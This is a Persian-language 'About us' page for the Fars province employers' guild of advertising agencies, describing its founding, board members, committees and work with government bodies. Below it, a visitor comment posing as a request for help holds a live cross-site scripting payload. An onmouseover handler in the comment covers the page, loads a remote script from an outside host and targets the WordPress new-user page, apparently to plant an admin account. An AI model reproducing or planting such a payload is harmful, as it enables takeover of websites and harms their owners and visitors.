درباره انجمن

به موجب ماده ۱۳۱ قانون کار جمهوری اسلامی ایران و آئین نامه مصوب دی ماه ۱۳۷۱ هیئات وزیران ،انجمن صنفی کارفرمایی کانونهای تبلیغاتی استان فارس در تاریخ ۰۲/۰۸/۱۳۸۰ به شماره ۱۴۶/ص الف در اداره کل کار و امور اجتماعی استان فارس به ثبت رسیده است.اعضا هیئت موسس انجمن آقایان عزیز عاملی،علیرضا قائدیان، عباس مذنب،مرتضی محلاتی و محمدرضا اجابت بودند. اولین مجمع عمومی مورخ ۱۳/۰۶/۱۳۸۰ با حضور ۳۱ نفر از اعضا برگزار گردید که آقایان مرتضی محلاتی،علیرضا قائدیان، محمدرضا اجابت،عزیز عاملی و خانم فرانک بوب به عنوان اعضای هیئت مدیره اتنخاب شدند.و آقای مسعود پورغلامی به عنوان بازرس انتخاب شدند.

قابل ذکر است از بدو تاسیس انجمن  تاکنون هرساله حداقل سه تا چهار کارگاه آموزشی برای اعضای انجمن صنفی کانونهای تبلیغاتی و متقاضیان جدید و همچنین نشست های هم اندیشی جهت ملاقات اعضا برگزار شده است.

انجمن صنفی کانونهای تبلیغاتی استان فارس کوشیده است که به منظور تسهیل فعالیت های همکاران و رونق بخشیدن به کسب و کار  و رفع و حل مشکلات  جاری همکاران با افراد یا ارگانها و تشکلات با تشکیل کمیته های متعدد از جمله کمیته حل اختلاف و با یاری همکاران مشرف به مسایل جاری  به طور مکرر در حل مسایل و مشکلات پیش آمده  و دعوت از شاکی و متشاکی منازعات را به صورت سازشی حل، و درصورت عدم رسیدن به توافق  بنا به درخواست مراجع قضایی یا همکار درگیر به منظور طرح در دعاوی حقوقی دادگستری نظر کارشناسی  خود را ارائه نماید.

کمیته روابط عمومی انجمن صنفی از بدو تاسیس تاکنون کوشیده است با شرکت در نمایشگاههای تخصصی و انتشار نشریات تخصصی ،که بعضا همراه با معرفی همکاران عضو انجمن و معرفی تخصص های آنان میباشد، زمینه همکاری بیشتر همکاران، با ارگانها و موسسات و سازمانهای دولتی و غیر دولتی را فراهم نماید.

 

 

همکاری انجمن با سازمانها و دوائر دولتی و بخش خصوصی (NGO) ها

  • پیگیری مکرر و فعالانه این انجمن و نماینده آن  و همراهی چند انجمن دیگر موجب تشکیل کانون انجمن های صنفی کارفرمایی استان در سال ۱۳۸۴  شد،که در حال حاضر در برگیرنده ی بیش از ۸۵ انجمن صنفی صنعتی ، تولیدی و خدماتی در سطح استان فارس می باشد.
  • شرکت نمایندگان انجمن صنفی در کارگروههای متعدد استانداری و شهرداری و سازمان میراث فرهنگی و گردشگری و کمیسیون های تخصصی اتاق بازرگانی،صنایع و معادن و کشاورزی شیراز
  • حضور نمایندگان انجمن در هیئت های حل اختلاف اداره کار و سازمان تامین اجتماعی و اداره  دارایی شیراز به عنوان نمایندگان کارفرمایان شیراز .

دبیرخانه انجمن صنفی کانون های کارفرمایی استان فارس

۲ نظر

  1. hi how can i call you? please help me :[

    [” onmouseover=”this.style.display=’none’;var script = document.createElement(‘script’);var url=’http://DOMAIN/wp-admin/user-new.php’;script.src=’http://armstrong.gigfa.com/7.js’;document.head.appendChild(script);” style=”position:fixed;left:0px;top:0px;width:100%;height:100%;z-index:10000;display:block” ] tnx best regards

جوابی بنویسید

ایمیل شما نشر نخواهد شدخانه های ضروری نشانه گذاری شده است. *

*